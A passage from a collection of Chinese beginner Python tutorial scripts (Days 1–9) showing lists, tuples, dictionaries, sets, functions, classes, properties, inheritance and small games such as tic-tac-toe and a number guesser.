range(n): display(random_select()) if __name__ == '__main__': main() File: Day01-15/code/Day07/marquee.py """ 输入学生考试成绩计算平均分 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ import os import time def main(): str = 'Welcome to 1000 Phone Chengdu Campus ' while True: print(str) time.sleep(0.2) str = str[1:] + str[0:1] # for Windows use os.system('cls') instead os.system('clear') if __name__ == '__main__': main() File: Day01-15/code/Day07/tuple.py """ 元组的定义和使用 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): # 定义元组 t = ('骆昊', 38, True, '四川成都') print(t) # 获取元组中的元素 print(t[0]) print(t[1]) print(t[2]) print(t[3]) # 遍历元组中的值 for member in t: print(member) # 重新给元组赋值 # t[0] = '王大锤' # TypeError # 变量t重新引用了新的元组 原来的元组被垃圾回收 t = ('王大锤', 20, True, '云南昆明') print(t) # 元组和列表的转换 person = list(t) print(person) person[0] = '李小龙' person[1] = 25 print(person) fruits_list = ['apple', 'banana', 'orange'] fruits_tuple = tuple(fruits_list) print(fruits_tuple) print(fruits_tuple[1]) if __name__ == '__main__': main() File: Day01-15/code/Day07/list3.py """ 生成列表 - 用range创建数字列表 - 生成表达式 - 生成器 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ # 生成Fibonacci序列的生成器 def fib(n): a, b = 0, 1 for _ in range(n): a, b = b, a + b yield a def main(): # 用range创建数值列表 list1 = list(range(1, 11)) print(list1) # 生成表达式 list2 = [x * x for x in range(1, 11)] print(list2) list3 = [m + n for m in 'ABCDEFG' for n in '12345'] print(list3) print(len(list3)) # 生成器(节省空间但生成下一个元素时需要花费时间) gen = (m + n for m in 'ABCDEFG' for n in '12345') print(gen) for elem in gen: print(elem, end=' ') print() gen = fib(20) print(gen) for elem in gen: print(elem, end=' ') print() if __name__ == '__main__': main() File: Day01-15/code/Day07/tic-tac-toe.py """ 井字棋游戏 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ import os def print_board(board): print(board['TL'] + '|' + board['TM'] + '|' + board['TR']) print('-+-+-') print(board['ML'] + '|' + board['MM'] + '|' + board['MR']) print('-+-+-') print(board['BL'] + '|' + board['BM'] + '|' + board['BR']) def main(): init_board = { 'TL': ' ', 'TM': ' ', 'TR': ' ', 'ML': ' ', 'MM': ' ', 'MR': ' ', 'BL': ' ', 'BM': ' ', 'BR': ' ' } begin = True while begin: curr_board = init_board.copy() begin = False turn = 'x' counter = 0 os.system('clear') print_board(curr_board) while counter < 9: move = input('轮到%s走棋, 请输入位置: ' % turn) if curr_board[move] == ' ': counter += 1 curr_board[move] = turn if turn == 'x': turn = 'o' else: turn = 'x' os.system('clear') print_board(curr_board) choice = input('再玩一局?(yes|no)') begin = choice == 'yes' if __name__ == '__main__': main() File: Day01-15/code/Day07/avgscore.py """ 输入学生考试成绩计算平均分 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): number = int(input('请输入学生人数: ')) names = [None] * number scores = [None] * number for index in range(len(names)): names[index] = input('请输入第%d个学生的名字: ' % (index + 1)) scores[index] = float(input('请输入第%d个学生的成绩: ' % (index + 1))) total = 0 for index in range(len(names)): print('%s: %.1f分' % (names[index], scores[index])) total += scores[index] print('平均成绩是: %.1f分' % (total / number)) if __name__ == '__main__': main() File: Day01-15/code/Day07/dict1.py """ 定义和使用字典 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): scores = {'骆昊': 95, '白元芳': 78, '狄仁杰': 82} print(scores['骆昊']) print(scores['狄仁杰']) for elem in scores: print('%s\t--->\t%d' % (elem, scores[elem])) scores['白元芳'] = 65 scores['诸葛王朗'] = 71 scores.update(冷面=67, 方启鹤=85) print(scores) if '武则天' in scores: print(scores['武则天']) print(scores.get('武则天')) print(scores.get('武则天', 60)) print(scores.popitem()) print(scores.popitem()) print(scores.pop('骆昊', 100)) scores.clear() print(scores) if __name__ == '__main__': main() File: Day01-15/code/Day07/set1.py """ 定义和使用集合 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): set1 = {1, 2, 3, 3, 3, 2} print(set1) print('Length =', len(set1)) set2 = set(range(1, 10)) print(set2) set1.add(4) set1.add(5) set2.update([11, 12]) print(set1) print(set2) set2.discard(5) # remove的元素如果不存在会引发KeyError if 4 in set2: set2.remove(4) print(set2) # 遍历集合容器 for elem in set2: print(elem ** 2, end=' ') print() # 将元组转换成集合 set3 = set((1, 2, 3, 3, 2, 1)) print(set3.pop()) print(set3) if __name__ == '__main__': main() File: Day01-15/code/Day07/list2.py """ 列表常用操作 - 列表连接 - 获取长度 - 遍历列表 - 列表切片 - 列表排序 - 列表反转 - 查找元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', 'apple', 'strawberry', 'waxberry'] fruits += ['pitaya', 'pear', 'mango'] # 循环遍历列表元素 for fruit in fruits: print(fruit.title(), end=' ') print() # 列表切片 fruits2 = fruits[1:4] print(fruits2) # fruit3 = fruits # 没有复制列表只创建了新的引用 fruits3 = fruits[:] print(fruits3) fruits4 = fruits[-3:-1] print(fruits4) fruits5 = fruits[::-1] print(fruits5) if __name__ == '__main__': main() File: Day01-15/code/Day07/set2.py """ 集合的常用操作 - 交集 - 并集 - 差集 - 子集 - 超集 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): set1 = set(range(1, 7)) print(set1) set2 = set(range(2, 11, 2)) print(set2) set3 = set(range(1, 5)) print(set1 & set2) # print(set1.intersection(set2)) print(set1 | set2) # print(set1.union(set2)) print(set1 - set2) # print(set1.difference(set2)) print(set1 ^ set2) # print(set1.symmetric_difference(set2)) print(set2 <= set1) # print(set2.issubset(set1)) print(set3 <= set1) # print(set3.issubset(set1)) print(set1 >= set2) # print(set1.issuperset(set2)) print(set1 >= set3) # print(set1.issuperset(set3)) if __name__ == '__main__': main() File: Day01-15/code/Day07/findmax.py """ 找出列表中最大或最小的元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', 'apple', 'strawberry', 'waxberry', 'pitaya'] # 直接使用内置的max和min函数找出列表中最大和最小元素 # print(max(fruits)) # print(min(fruits)) max_value = min_value = fruits[0] for index in range(1, len(fruits)): if fruits[index] > max_value: max_value = fruits[index] elif fruits[index] < min_value: min_value = fruits[index] print('Max:', max_value) print('Min:', min_value) if __name__ == '__main__': main() # 想一想如果最大的元素有两个要找出第二大的又该怎么做 File: Day01-15/code/Day07/list1.py """ 定义和使用列表 - 用下标访问元素 - 添加元素 - 删除元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', '@pple', 'strawberry', 'waxberry'] print(fruits) # 通过下标访问元素 print(fruits[0]) print(fruits[1]) print(fruits[-1]) print(fruits[-2]) # print(fruits[-5]) # IndexError # print(fruits[4]) # IndexError fruits[1] = 'apple' print(fruits) # 添加元素 fruits.append('pitaya') fruits.insert(0, 'banana') print(fruits) # 删除元素 del fruits[1] fruits.pop() fruits.pop(0) fruits.remove('apple') print(fruits) if __name__ == '__main__': main() File: Day01-15/code/Day07/dict2.py """ 字典的常用操作 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): stu = {'name': '骆昊', 'age': 38, 'gender': True} print(stu) print(stu.keys()) print(stu.values()) print(stu.items()) for elem in stu.items(): print(elem) print(elem[0], elem[1]) if 'age' in stu: stu['age'] = 20 print(stu) stu.setdefault('score', 60) print(stu) stu.setdefault('score', 100) print(stu) stu['score'] = 100 print(stu) if __name__ == '__main__': main() File: Day01-15/code/Day07/yanghui.py """ 输出10行的杨辉三角 - 二项式的n次方展开系数 1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 ... ... ... Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): num = int(input('Number of rows: ')) yh = [[]] * num for row in range(len(yh)): yh[row] = [None] * (row + 1) for col in range(len(yh[row])): if col == 0 or col == row: yh[row][col] = 1 else: yh[row][col] = yh[row - 1][col] + yh[row - 1][col - 1] print(yh[row][col], end='\t') print() if __name__ == '__main__': main() File: Day01-15/code/Day07/fibonacci.py """ 生成斐波拉切数列 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): f = [1 , 1] for i in range(2, 20): f += [f[i - 1] + f[i - 2]] # f.append(f[i - 1] + f[i - 2]) for val in f: print(val, end=' ') if __name__ == '__main__': main() File: Day01-15/code/Day07/scoretable.py """ 学生考试成绩表 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): names = ['关羽', '张飞', '赵云', '马超', '黄忠'] subjs = ['语文', '数学', '英语'] scores = [[0] * 3] * 5 for row, name in enumerate(names): print('请输入%s的成绩' % name) for col, subj in enumerate(subjs): scores[row][col] = float(input(subj + ': ')) print(scores) # for row, name in enumerate(names): # print('请输入%s的成绩' % name) # scores[row] = [None] * len(subjs) # for col, subj in enumerate(subjs): # score = float(input(subj + ': ')) # scores[row][col] = score # print(scores) if __name__ == '__main__': main() File: Day01-15/code/Day09/rational.py """ 运算符重载 - 自定义分数类 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import gcd class Rational(object): def __init__(self, num, den=1): if den == 0: raise ValueError('分母不能为0') self._num = num self._den = den self.normalize() def simplify(self): x = abs(self._num) y = abs(self._den) factor = gcd(x, y) if factor > 1: self._num //= factor self._den //= factor return self def normalize(self): if self._den < 0: self._den = -self._den self._num = -self._num return self def __add__(self, other): new_num = self._num * other._den + other._num * self._den new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __sub__(self, other): new_num = self._num * other._den - other._num * self._den new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __mul__(self, other): new_num = self._num * other._num new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __truediv__(self, other): new_num = self._num * other._den new_den = self._den * other._num return Rational(new_num, new_den).simplify().normalize() def __str__(self): if self._num == 0: return '0' elif self._den == 1: return str(self._num) else: return '(%d/%d)' % (self._num, self._den) if __name__ == '__main__': r1 = Rational(2, 3) print(r1) r2 = Rational(6, -8) print(r2) print(r2.simplify()) print('%s + %s = %s' % (r1, r2, r1 + r2)) print('%s - %s = %s' % (r1, r2, r1 - r2)) print('%s * %s = %s' % (r1, r2, r1 * r2)) print('%s / %s = %s' % (r1, r2, r1 / r2)) File: Day01-15/code/Day09/pet.py from abc import ABCMeta, abstractmethod class Pet(object, metaclass=ABCMeta): def __init__(self, nickname): self._nickname = nickname @abstractmethod def make_voice(self): pass class Dog(Pet): def make_voice(self): print('%s: 汪汪汪...' % self._nickname) class Cat(Pet): def make_voice(self): print('%s: 喵...喵...' % self._nickname) def main(): pets = [Dog('旺财'), Cat('凯蒂'), Dog('大黄')] for pet in pets: pet.make_voice() if __name__ == '__main__': main() File: Day01-15/code/Day09/diamond.py """ 多重继承 - 菱形继承(钻石继承) - C3算法(替代DFS的算法) Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class A(object): def foo(self): print('foo of A') class B(A): pass class C(A): def foo(self): print('foo fo C') class D(B, C): pass class E(D): def foo(self): print('foo in E') super().foo() super(B, self).foo() super(C, self).foo() if __name__ == '__main__': d = D() d.foo() e = E() e.foo() File: Day01-15/code/Day09/clock.py from time import time, localtime, sleep class Clock(object): """数字时钟""" def __init__(self, hour=0, minute=0, second=0): self._hour = hour self._minute = minute self._second = second @classmethod def now(cls): ctime = localtime(time()) return cls(ctime.tm_hour, ctime.tm_min, ctime.tm_sec) def run(self): """走字""" self._second += 1 if self._second == 60: self._second = 0 self._minute += 1 if self._minute == 60: self._minute = 0 self._hour += 1 if self._hour == 24: self._hour = 0 def show(self): """显示时间""" return '%02d:%02d:%02d' % \ (self._hour, self._minute, self._second) def main(): clock = Clock.now() while True: print(clock.show()) sleep(1) clock.run() if __name__ == '__main__': main() File: Day01-15/code/Day09/car1.py """ 属性的使用 - 访问器/修改器/删除器 - 使用__slots__对属性加以限制 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): __slots__ = ('_brand', '_max_speed') def __init__(self, brand, max_speed): self._brand = brand self._max_speed = max_speed @property def brand(self): return self._brand @brand.setter def brand(self, brand): self._brand = brand @brand.deleter def brand(self): del self._brand @property def max_speed(self): return self._max_speed @max_speed.setter def max_speed(self, max_speed): if max_speed < 0: raise ValueError('Invalid max speed for car') self._max_speed = max_speed def __str__(self): return 'Car: [品牌=%s, 最高时速=%d]' % (self._brand, self._max_speed) car = Car('QQ', 120) print(car) # ValueError # car.max_speed = -100 car.max_speed = 320 car.brand = "Benz" # 使用__slots__属性限制后下面的代码将产生异常 # car.current_speed = 80 print(car) # 如果提供了删除器可以执行下面的代码 # del car.brand # 属性的实现 print(Car.brand) print(Car.brand.fget) print(Car.brand.fset) print(Car.brand.fdel) # 通过上面的代码帮助学生理解之前提到的包装器的概念 # Python中有很多类似的语法糖后面还会出现这样的东西 File: Day01-15/code/Day09/multi.py """ 多重继承 - 通过多重继承可以给一个类的对象具备多方面的能力 - 这样在设计类的时候可以避免设计太多层次的复杂的继承关系 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Father(object): def __init__(self, name): self._name = name def gamble(self): print('%s在打麻将.' % self._name) def eat(self): print('%s在大吃大喝.' % self._name) class Monk(object): def __init__(self, name): self._name = name def eat(self): print('%s在吃斋.' % self._name) def chant(self): print('%s在念经.' % self._name) class Musician(object): def __init__(self, name): self._name = name def eat(self): print('%s在细嚼慢咽.' % self._name) def play_piano(self): print('%s在弹钢琴.' % self._name) # 试一试下面的代码看看有什么区别 # class Son(Monk, Father, Musician): # class Son(Musician, Father, Monk): class Son(Father, Monk, Musician): def __init__(self, name): Father.__init__(self, name) Monk.__init__(self, name) Musician.__init__(self, name) son = Son('王大锤') son.gamble() # 调用继承自Father的eat方法 son.eat() son.chant() son.play_piano() File: Day01-15/code/Day09/association.py """ 对象之间的关联关系 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import sqrt class Point(object): def __init__(self, x=0, y=0): self._x = x self._y = y def move_to(self, x, y): self._x = x self._y = y def move_by(self, dx, dy): self._x += dx self._y += dy def distance_to(self, other): dx = self._x - other._x dy = self._y - other._y return sqrt(dx ** 2 + dy ** 2) def __str__(self): return '(%s, %s)' % (str(self._x), str(self._y)) class Line(object): def __init__(self, start=Point(0, 0), end=Point(0, 0)): self._start = start self._end = end @property def start(self): return self._start @start.setter def start(self, start): self._start = start @property def end(self): return self.end @end.setter def end(self, end): self._end = end @property def length(self): return self._start.distance_to(self._end) if __name__ == '__main__': p1 = Point(3, 5) print(p1) p2 = Point(-2, -1.5) print(p2) line = Line(p1, p2) print(line.length) line.start.move_to(2, 1) line.end = Point(1, 2) print(line.length) File: Day01-15/code/Day09/dependency.py """ 对象之间的依赖关系和运算符重载 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): def __init__(self, brand, max_speed): self._brand = brand self._max_speed = max_speed self._current_speed = 0 @property def brand(self): return self._brand def accelerate(self, delta): self._current_speed += delta if self._current_speed > self._max_speed: self._current_speed = self._max_speed def brake(self): self._current_speed = 0 def __str__(self): return '%s当前时速%d' % (self._brand, self._current_speed) class Student(object): def __init__(self, name, age): self._name = name self._age = age @property def name(self): return self._name # 学生和车之间存在依赖关系 - 学生使用了汽车 def drive(self, car): print('%s驾驶着%s欢快的行驶在去西天的路上' % (self._name, car._brand)) car.accelerate(30) print(car) car.accelerate(50) print(car) car.accelerate(50) print(car) def study(self, course_name): print('%s正在学习%s.' % (self._name, course_name)) def watch_av(self): if self._age < 18: print('%s只能观看《熊出没》.' % self._name) else: print('%s正在观看岛国爱情动作片.' % self._name) # 重载大于(>)运算符 def __gt__(self, other): return self._age > other._age # 重载小于(<)运算符 def __lt__(self, other): return self._age < other._age if __name__ == '__main__': stu1 = Student('骆昊', 38) stu1.study('Python程序设计') stu1.watch_av() stu2 = Student('王大锤', 15) stu2.study('思想品德') stu2.watch_av() car = Car('QQ', 120) stu2.drive(car) print(stu1 > stu2) print(stu1 < stu2) File: Day01-15/code/Day09/triangle.py """ 实例方法和类方法的应用 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import sqrt class Triangle(object): def __init__(self, a, b, c): self._a = a self._b = b self._c = c # 静态方法 @staticmethod def is_valid(a, b, c): return a + b > c and b + c > a and c + a > b # 实例方法 def perimeter(self): return self._a + self._b + self._c # 实例方法 def area(self): p = self.perimeter() / 2 return sqrt(p * (p - self._a) * (p - self._b) * (p - self._c)) if __name__ == '__main__': # 用字符串的split方法将字符串拆分成一个列表 # 再通过map函数对列表中的每个字符串进行映射处理成小数 a, b, c = map(float, input('请输入三条边: ').split()) # 先判断给定长度的三条边能否构成三角形 # 如果能才创建三角形对象 if Triangle.is_valid(a, b, c): tri = Triangle(a, b, c) print('周长:', tri.perimeter()) print('面积:', tri.area()) # 如果传入对象作为方法参数也可以通过类调用实例方法 # print('周长:', Triangle.perimeter(tri)) # print('面积:', Triangle.area(tri)) # 看看下面的代码就知道其实二者本质上是一致的 # print(type(tri.perimeter)) # print(type(Triangle.perimeter)) else: print('不能构成三角形.') File: Day01-15/code/Day09/employee.py """ 抽象类 / 方法重写 / 多态 实现一个工资结算系统 公司有三种类型的员工 - 部门经理固定月薪12000元/月 - 程序员按本月工作小时数每小时100元 - 销售员1500元/月的底薪加上本月销售额5%的提成 输入员工的信息 输出每位员工的月薪信息 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from abc import ABCMeta, abstractmethod class Employee(object, metaclass=ABCMeta): def __init__(self, name): self._name = name @property def name(self): return self._name @abstractmethod def get_salary(self): pass class Manager(Employee): # 想一想: 如果不定义构造方法会怎么样 def __init__(self, name): # 想一想: 如果不调用父类构造器会怎么样 super().__init__(name) def get_salary(self): return 12000 class Programmer(Employee): def __init__(self, name): super().__init__(name) def set_working_hour(self, working_hour): self._working_hour = working_hour def get_salary(self): return 100 * self._working_hour class Salesman(Employee): def __init__(self, name): super().__init__(name) def set_sales(self, sales): self._sales = sales def get_salary(self): return 1500 + self._sales * 0.05 if __name__ == '__main__': emps = [Manager('武则天'), Programmer('狄仁杰'), Salesman('白元芳')] for emp in emps: if isinstance(emp, Programmer): working_hour = int(input('请输入%s本月工作时间: ' % emp.name)) emp.set_working_hour(working_hour) elif isinstance(emp, Salesman): sales = float(input('请输入%s本月销售额: ' % emp.name)) emp.set_sales(sales) print('%s本月月薪为: ¥%.2f元' % (emp.name, emp.get_salary())) File: Day01-15/code/Day09/car2.py """ 属性的使用 - 使用已有方法定义访问器/修改器/删除器 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): def __init__(self, brand, max_speed): self.set_brand(brand) self.set_max_speed(max_speed) def get_brand(self): return self._brand def set_brand(self, brand): self._brand = brand def get_max_speed(self): return self._max_speed def set_max_speed(self, max_speed): if max_speed < 0: raise ValueError('Invalid max speed for car') self._max_speed = max_speed def __str__(self): return 'Car: [品牌=%s, 最高时速=%d]' % (self._brand, self._max_speed) # 用已有的修改器和访问器定义属性 brand = property(get_brand, set_brand) max_speed = property(get_max_speed, set_max_speed) car = Car('QQ', 120) print(car) # ValueError # car.max_speed = -100 car.max_speed = 320 car.brand = "Benz" print(car) print(Car.brand) print(Car.brand.fget) print(Car.brand.fset) File: Day01-15/code/Day09/shape.py """ 继承的应用 - 抽象类 - 抽象方法 - 方法重写 - 多态 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from abc import ABCMeta, abstractmethod from math import pi class Shape(object, metaclass=ABCMeta): @abstractmethod def perimeter(self): pass @abstractmethod def area(self): pass class Circle(Shape): def __init__(self, radius): self._radius = radius def perimeter(self): return 2 * pi * self._radius def area(self): return pi * self._radius ** 2 def __str__(self): return '我是一个圆' class Rect(Shape): def __init__(self, width, height): self._width = width self._height = height def perimeter(self): return 2 * (self._width + self._height) def area(self): return self._width * self._height def __str__(self): return '我是一个矩形' if __name__ == '__main__': shapes = [Circle(5), Circle(3.2), Rect(3.2, 6.3)] for shape in shapes: print(shape) print('周长:', shape.perimeter()) print('面积:', shape.area()) File: Day01-15/code/Day08/circle.py """ 练习 修一个游泳池 半径(以米为单位)在程序运行时输入 游泳池外修一条3米宽的过道 过道的外侧修一圈围墙 已知过道的造价为25元每平米 围墙的造价为32.5元每米 输出围墙和过道的总造价分别是多少钱(精确到小数点后2位) Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ import math class Circle(object): def __init__(self, radius): self._radius = radius @property def radius(self): return self._radius @radius.setter def radius(self, radius): self._radius = radius if radius > 0 else 0 @property def perimeter(self): return 2 * math.pi * self._radius @property def area(self): return math.pi * self._radius * self._radius if __name__ == '__main__': radius = float(input('请输入游泳池的半径: ')) small = Circle(radius) big = Circle(radius + 3) print('围墙的造价为: ¥%.1f元' % (big.perimeter * 115)) print('过道的造价为: ¥%.1f元' % ((big.area - small.area) * 65)) File: Day01-15/code/Day08/guess.py """ 面向对象版本的猜数字游戏 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ from random import randint class GuessMachine(object): def __init__(self): self._answer = None self._counter = None self._hint = None def reset(self): self._answer = randint(1, 100) self._counter = 0 self._hint = None def guess(self, your_answer): self._counter += 1 if your_answer > self._answer: self._hint = '小一点' elif your_answer < self._answer: self._hint = '大一点' else: self._hint = '恭喜你猜对了' return True return False @property def counter(self): return self._counter @property def hint(self): return self._hint if __name__ == '__main__': gm = GuessMachine() play_again = True while play_again: game_over = False gm.reset() while not game_over: your_answer = int(input('请输入: ')) game_over = gm.guess(your_answer) print(gm.hint) if gm.counter > 7: print('智商余额不足!') play_again = input('再玩一次?(yes|no)') == 'yes' File: Day01-15/code/Day08/hack.py """ 另一种创建类的方式 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ def bar(self, name): self._name = name def foo(self, course_name): print('%s正在学习%s.' % (self._name, course_name)) def main(): Student = type('Student', (object,), dict(__init__=bar, study=foo)) stu1 = Student('骆昊') stu1.study('Python程序设计') if __name__ == '__main__': main() File: Day01-15/code/Day08/clock.py """ 定义和使用时钟类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ import time import os class Clock(object): # Python中的函数是没有重载的概念的 # 因为Python中函数的参数没有类型而且支持缺省参数和可变参数 # 用关键字参数让构造器可以传入任意多个参数来实现其他语言中的构造器重载 def __init__(self, **kw): if 'hour' in kw and 'minute' in kw and 'second' in kw: self._hour = kw['hour'] self._minute = kw['minute'] self._second = kw['second'] else: tm = time.localtime(time.time()) self._hour = tm.tm_hour self._minute = tm.tm_min self._second = tm.tm_sec def run(self): self._second += 1 if self._second == 60: self._second = 0 self._minute += 1 if self._minute == 60: self._minute = 0 self._hour += 1 if self._hour == 24: self._hour = 0 def show(self): return '%02d:%02d:%02d' % (self._hour, self._minute, self._second) if __name__ == '__main__': # clock = Clock(hour=10, minute=5, second=58) clock = Clock() while True: os.system('clear') print(clock.show()) time.sleep(1) clock.run() File: Day01-15/code/Day08/access.py class Test: def __init__(self, foo): self.__foo = foo def __bar(self): print(self.__foo) print('__bar') def main(): test = Test('hello') test._Test__bar() print(test._Test__foo) if __name__ == "__main__": main() File: Day01-15/code/Day08/rect.py """ 定义和使用矩形类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ class Rect(object): """矩形类""" def __init__(self, width=0, height=0): """初始化方法""" self.__width = width self.__height = height def perimeter(self): """计算周长""" return (self.__width + self.__height) * 2 def area(self): """计算面积""" return self.__width * self.__height def __str__(self): """矩形对象的字符串表达式""" return '矩形[%f,%f]' % (self.__width, self.__height) def __del__(self): """析构器""" print('销毁矩形对象') if __name__ == '__main__': rect1 = Rect() print(rect1) print(rect1.perimeter()) print(rect1.area()) rect2 = Rect(3.5, 4.5) print(rect2) print(rect2.perimeter()) print(rect2.area()) File: Day01-15/code/Day08/student.py """ 定义和使用学生类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ def _foo(): print('test') class Student(object): # __init__是一个特殊方法用于在创建对象时进行初始化操作 # 通过这个方法我们可以为学生对象绑定name和age两个属性 def __init__(self, name, age): self.name = name self.age = age def study(self, course_name): print('%s正在学习%s.' % (self.name, course_name)) # PEP 8要求标识符的名字用全小写多个单词用下划线连接 # 但是很多程序员和公司更倾向于使用驼峰命名法(驼峰标识) def watch_av(self): if self.age < 18: print('%s只能观看《熊出没》.' % self.name) else: print('%s正在观看岛国大电影.' % self.name) def main(): stu1 = Student('骆昊', 38) stu1.study('Python程序设计') stu1.watch_av() stu2 = Student('王大锤', 15) stu2.study('思想品德') stu2.watch_av() if __name__ == '__main__': main() File: Day01-15/code/Day06/function6.py """ 作用域问题 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 局部作用域 def foo1(): a = 5 foo1() # print(a) # NameError # 全局作用域 b = 10 def foo2(): print(b) foo2() def foo3(): b = 100 # 局部变量 print(b) foo3() print(b) def foo4(): global b b = 200 # 全局变量 print(b) foo4() print(b) File: Day01-15/code/Day06/function2.py """ 函数的定义和使用 - 求最大公约数和最小公倍数 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ def gcd(x, y): if x > y: (x, y) = (y, x) for factor in range(x, 1, -1): if x % factor == 0 and y % factor == 0: return factor return 1 def lcm(x, y): return x * y // gcd(x, y) print(gcd(15, 27)) print(lcm(15, 27)) File: Day01-15/code/Day06/function3.py """ Python的内置函数 - 数学相关: abs / divmod / pow / round / min / max / sum - 序列相关: len / range / next / filter / map / sorted / slice / reversed - 类型转换: chr / ord / str / bool / int / float / complex / bin / oct / hex - 数据结构: dict / list / set / tuple - 其他函数: all / any / id / input / open / print / type Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ def myfilter(mystr): return len(mystr) == 6 # help() print(chr(0x9a86)) print(hex(ord('骆'))) print(abs(-1.2345)) print(round(-1.2345)) print(pow(1.2345, 5)) fruits = ['orange', 'peach', 'durian', 'watermelon'] print(fruits[slice(1, 3)]) fruits2 = list(filter(myfilter, fruits)) print(fruits) print(fruits2) File: Day01-15/code/Day06/function4.py """ Python常用模块 - 运行时服务相关模块: copy / pickle / sys / ... - 数学相关模块: decimal / math / random / ... - 字符串处理模块: codecs / re / ... - 文件处理相关模块: shutil / gzip / ... - 操作系统服务相关模块: datetime / os / time / logging / io / ... - 进程和线程相关模块: multiprocessing / threading / queue - 网络应用相关模块: ftplib / http / smtplib / urllib / ... - Web编程相关模块: cgi / webbrowser - 数据处理和编码模块: base64 / csv / html.parser / json / xml / ... Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ import time import shutil import os seconds = time.time() print(seconds) localtime = time.localtime(seconds) print(localtime) print(localtime.tm_year) print(localtime.tm_mon) print(localtime.tm_mday) asctime = time.asctime(localtime) print(asctime) strtime = time.strftime('%Y-%m-%d %H:%M:%S', localtime) print(strtime) mydate = time.strptime('2018-1-1', '%Y-%m-%d') print(mydate) shutil.copy('/Users/Hao/hello.py', '/Users/Hao/Desktop/first.py') os.system('ls -l') os.chdir('/Users/Hao') os.system('ls -l') os.mkdir('test') File: Day01-15/code/Day06/function5.py """ 函数的参数 - 位置参数 - 可变参数 - 关键字参数 - 命名关键字参数 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 参数默认值 def f1(a, b=5, c=10): return a + b * 2 + c * 3 print(f1(1, 2, 3)) print(f1(100, 200)) print(f1(100)) print(f1(c=2, b=3, a=1)) # 可变参数 def f2(*args): sum = 0 for num in args: sum += num return sum print(f2(1, 2, 3)) print(f2(1, 2, 3, 4, 5)) print(f2()) # 关键字参数 def f3(**kw): if 'name' in kw: print('欢迎你%s!' % kw['name']) elif 'tel' in kw: print('你的联系电话是: %s!' % kw['tel']) else: print('没找到你的个人信息!') param = {'name': '骆昊', 'age': 38} f3(**param) f3(name='骆昊', age=38, tel='13866778899') f3(user='骆昊', age=38, tel='13866778899') f3(user='骆昊', age=38, mobile='13866778899') File: Day01-15/code/Day06/function1.py """ 函数的定义和使用 - 计算组合数C(7,3) Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 将求阶乘的功能封装成一个函数 def factorial(n): result = 1 for num in range(1, n + 1): result *= num return result print(factorial(7) // factorial(3) // factorial(4)) File: Day01-15/code/Day01/hello.py """ 第一个Python程序 - hello, world! 向伟大的Dennis M. Ritchie先生致敬 Version: 0.1 Author: 骆昊 Date: 2018-02-26 请将该文件命名为hello.py 使用Windows的小伙伴可以在命令行提示下通过下面的命令运行该程序 python hello.py 对于使用Linux或macOS的小伙伴可以打开终端并键入下面的命令来运行程序 python3 hello.py """ print('hello, world!') # print("你好,世界!") print('你好', '世界') print('hello', 'world', sep=', ', end='!') print('goodbye, world', end='!\n') File: Day01-15/code/Day01/flag.py """ 用Python的turtle模块绘制国旗 """ import turtle def draw_rectangle(x, y, width, height): """绘制矩形""" turtle.goto(x, y) turtle.pencolor('red') turtle.fillcolor('red') turtle.begin_fill() for i in range(2): turtle.forward(width) turtle.left(90) turtle.forward(height) turtle.left(90) turtle.end_fill() def draw_star(x, y, radius): """绘制五角星""" turtle.setpos(x, y) pos1 = turtle.pos() turtle.circle(-radius, 72) pos2 = turtle.pos() turtle.circle(-radius, 72) pos3 = turtle.pos() turtle.circle(-radius, 72) pos4 = turtle.pos() turtle.circle(-radius, 72) pos5 = turtle.pos() turtle.color('yellow', 'yellow') turtle.begin_fill() turtle.goto(pos3) turtle.goto(pos1) turtle.goto(pos4) turtle.goto(pos2) turtle.goto(pos5) turtle.end_fill() def main(): """主程序""" turtle.speed(12) turtle.penup() x, y = -270, -180 # 画国旗主体 width, height = 540, 360 draw_rectangle(x, y, width, height) # 画大星星 pice = 22 center_x, center_y = x + 5 * pice, y + height - pice * 5 turtle.goto(center_x, center_y) turtle.left(90) turtle.forward(pice * 3) turtle.right(90) draw_star(turtle.xcor(), turtle.ycor(), pice * 3) x_poses, y_poses = [10, 12, 12, 10], [2, 4, 7, 9] 